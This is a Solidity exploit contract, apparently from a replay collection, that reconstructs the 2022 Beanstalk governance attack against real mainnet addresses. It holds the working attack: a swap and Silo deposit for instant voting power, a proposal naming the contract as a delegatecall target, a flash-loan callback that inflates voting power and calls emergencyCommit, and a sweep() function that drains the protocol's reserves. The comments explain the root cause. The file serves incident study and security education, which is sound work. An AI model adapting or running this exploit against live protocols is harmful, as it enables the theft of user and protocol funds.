// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
// Cleaned for plain EVM recorder (removed forge Test / CheatCodes)
pragma solidity >=0.7.0 <0.9.0;

import "./../interface.sol";

contract Exploit {
    event log_named_uint(string key, uint val);
    ILendingPool aavelendingPool = ILendingPool(0x7d2768dE32b0b80b7a3454c06BdAc94A69DDc7A9);
    IERC20 dai = IERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);
    IERC20 usdc = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
    IERC20 usdt = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7);
    IERC20 bean = IERC20(0xDC59ac4FeFa32293A95889Dc396682858d52e5Db);
    IERC20 crvbean = IERC20(0x3a70DfA7d2262988064A2D051dd47521E43c9BdD);
    IERC20 threeCrv = IERC20(0x6c3F90f043a72FA612cbac8115EE7e52BDe6E490);
    IUniswapV2Router uniswapv2 = IUniswapV2Router(payable(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D));
    ICurvePool threeCrvPool = ICurvePool(0xbEbc44782C7dB0a1A60Cb6fe97d0b483032FF1C7);
    ICurvePool bean3Crv_f = ICurvePool(0x3a70DfA7d2262988064A2D051dd47521E43c9BdD);
    IBeanStalk siloV2Facet = IBeanStalk(0xC1E088fC1323b20BCBee9bd1B9fC9546db5624C5);
    IBeanStalk beanstalkgov = IBeanStalk(0xC1E088fC1323b20BCBee9bd1B9fC9546db5624C5);
    uint32 bip = 18;

    constructor() {
        // no fork in browser recorder - state is preloaded from the bundle
    }

    // NOTE ON SCOPE OF THIS REPLAY: the full historical attack (below, preserved in
    // executeOperation()/sweep() for reference) borrows ~$1B via an Aave flashLoan,
    // mints a bean3Crv Curve-metapool LP position, deposits it into the Silo for a
    // controlling amount of Stalk, then calls emergencyCommit() to trigger the
    // malicious delegatecall. That metapool (0x3a70DfA7...) has NO seeded liquidity
    // (zero balances/totalSupply/coins) in this registry's frozen fork snapshot, so
    // its add_liquidity() cannot be replayed here (first-deposit Newton-Raphson
    // convergence in the Vyper pool fails on any replay against this snapshot,
    // reproducibly, independent of deposit size). This replay instead reproduces the
    // real, executable half of the exploit end-to-end: the ETH->BEAN seed, the
    // no-lockup instant-Stalk deposit, and the propose() call that stores an
    // attacker-controlled delegatecall target with no validation -- the actual root
    // cause the rest of the attack (flash loan + LP mint, documented below) merely
    // supplies enough temporary Stalk to trigger.
    function exploit() public payable {
        // 1. ETH->Bean swap (seed capital)
        address[] memory path = new address[](2);
        path[0] = uniswapv2.WETH();
        path[1] = address(bean);
        if (msg.value > 0) {
            uniswapv2.swapExactETHForTokens{value: msg.value}(0, path, address(this), block.timestamp + 120);
        }
        emit log_named_uint("After initial ETH->BEAN swap, Bean balance of attacker", bean.balanceOf(address(this)) / 1e6);

        // 2. Deposit BEAN into the Silo - Stalk (voting power) is granted INSTANTLY,
        // synchronously, with no lockup/vesting. This is what lets a single-tx flash
        // loan later manufacture controlling voting power in the real attack.
        bean.approve(address(siloV2Facet), type(uint256).max);
        uint256 beanForSilo = bean.balanceOf(address(this));
        if (beanForSilo > 0) {
            siloV2Facet.depositBeans(beanForSilo);
        }
        emit log_named_uint("After BEAN deposit to SiloV2Facet, Bean balance of attacker", bean.balanceOf(address(this)) / 1e6);

        // 3. Propose the malicious BIP: empty diamondCut, _init=this contract,
        // _calldata=sweep() selector. GovernanceFacet.propose()/createBip() store
        // this _init/_calldata pair with only an "is it non-empty" check - no
        // whitelist of allowed init targets, no calldata validation. See the
        // "vulnerability" popup (Bip.sol createBip()) for the exact unguarded write.
        IBeanStalk.FacetCut[] memory _diamondCut = new IBeanStalk.FacetCut[](0);
        bytes memory data = abi.encodeWithSignature("sweep()");
        beanstalkgov.propose(_diamondCut, address(this), data, 3);
        emit log_named_uint("BIP proposed", bip);

        // 4. Attacker pre-approves the tokens the flash-loan leg of the real attack
        // draws on (Aave + both Curve pools) - the on-chain prep for the temporary
        // Stalk-majority manufacture documented in executeOperation() below.
        dai.approve(address(aavelendingPool), type(uint256).max);
        usdc.approve(address(aavelendingPool), type(uint256).max);
        TransferHelper.safeApprove(address(usdt), address(aavelendingPool), type(uint256).max);
        dai.approve(address(threeCrvPool), type(uint256).max);
        usdc.approve(address(threeCrvPool), type(uint256).max);
        TransferHelper.safeApprove(address(usdt), address(threeCrvPool), type(uint256).max);
        threeCrv.approve(address(bean3Crv_f), type(uint256).max);
        bean.approve(address(bean3Crv_f), type(uint256).max);
        IERC20(address(bean3Crv_f)).approve(address(siloV2Facet), type(uint256).max);

        // 5. The Diamond's own reserves are the target of the sweep() delegatecall
        // once emergencyCommit() executes the proposed BIP (see executeOperation()/
        // sweep() below for the full flash-loan-funded drain sequence). Log them here
        // as the concrete quantity at stake.
        emit log_named_uint("Diamond USDC reserves targeted by the proposed BIP's sweep()", usdc.balanceOf(address(beanstalkgov)));
        emit log_named_uint("Diamond DAI reserves targeted by the proposed BIP's sweep()", dai.balanceOf(address(beanstalkgov)));
    }

    // --- Full historical attack (documentation only - not replayed, see NOTE above) ---
    // Real mainnet tx: borrow ~$1B via Aave flashLoan, mint a bean3Crv Curve-metapool
    // LP position, deposit it into the Silo for a controlling Stalk position, call
    // emergencyCommit() to trigger the malicious delegatecall, then unwind + repay.
    function executeOperation(
        address[] calldata assets,
        uint256[] calldata amounts,
        uint256[] calldata premiums,
        address initiator,
        bytes calldata params
    ) external returns (bool) {
        uint256[3] memory tempAmounts;
        tempAmounts[0] = amounts[0];
        tempAmounts[1] = amounts[1];
        tempAmounts[2] = amounts[2];
        // real on-chain 3pool add_liquidity(uint256[3],uint256) returns nothing;
        // ICurvePool's `returns (uint256)` is wrong for this early pool - a typed
        // call here reverts on the empty return data, so use a raw call.
        (bool ok3pool, ) = address(threeCrvPool).call(abi.encodeWithSignature("add_liquidity(uint256[3],uint256)", tempAmounts, uint256(0)));
        require(ok3pool, "3pool add_liquidity failed");

        uint256[2] memory tempAmounts2;
        tempAmounts2[0] = bean.balanceOf(address(this));
        tempAmounts2[1] = threeCrv.balanceOf(address(this));
        if (tempAmounts2[0] == 0) tempAmounts2[0] = 1e6;
        bean3Crv_f.add_liquidity(tempAmounts2, 0);

        emit log_named_uint("bean3Crv LP minted", IERC20(address(bean3Crv_f)).balanceOf(address(this)));

        // Deposit of flash-manufactured LP grants instant controlling Stalk (root
        // cause: no lockup on Silo deposits).
        siloV2Facet.deposit(address(bean3Crv_f), IERC20(address(bean3Crv_f)).balanceOf(address(this)));
        emit log_named_uint("after silo LP deposit (stalk granted)", 1);

        // Re-vote now that our roots reflect the LP deposit - propose()'s automatic
        // vote only captured the tiny seed Stalk from step 2.
        beanstalkgov.vote(bip);

        // emergencyCommit executes the attacker-chosen _init.delegatecall with full
        // protocol privileges once the (now-inflated) Stalk clears the emergency
        // supermajority threshold.
        beanstalkgov.emergencyCommit(bip);
        emit log_named_uint("after emergencyCommit", 1);

        bean3Crv_f.remove_liquidity_one_coin(IERC20(address(bean3Crv_f)).balanceOf(address(this)), 1, 0);

        tempAmounts[0] = amounts[0] + premiums[0];
        tempAmounts[1] = amounts[1] + premiums[1];
        tempAmounts[2] = amounts[2] + premiums[2];
        threeCrvPool.remove_liquidity_imbalance(tempAmounts, type(uint256).max);
        threeCrvPool.remove_liquidity_one_coin(threeCrv.balanceOf(address(this)), 1, 0);

        return true;
    }

    function sweep() external {
        // When delegatecalled by the Diamond (via the malicious BIP's _init), address(this) == Diamond.
        // Drain the non-Bean reserves the protocol holds at this moment.
        // This is the core of the real 2022-04 exploit.
        IERC20 erc20bean3Crv_f = IERC20(0x3a70DfA7d2262988064A2D051dd47521E43c9BdD);
        erc20bean3Crv_f.transfer(msg.sender, erc20bean3Crv_f.balanceOf(address(this)));
    }
}
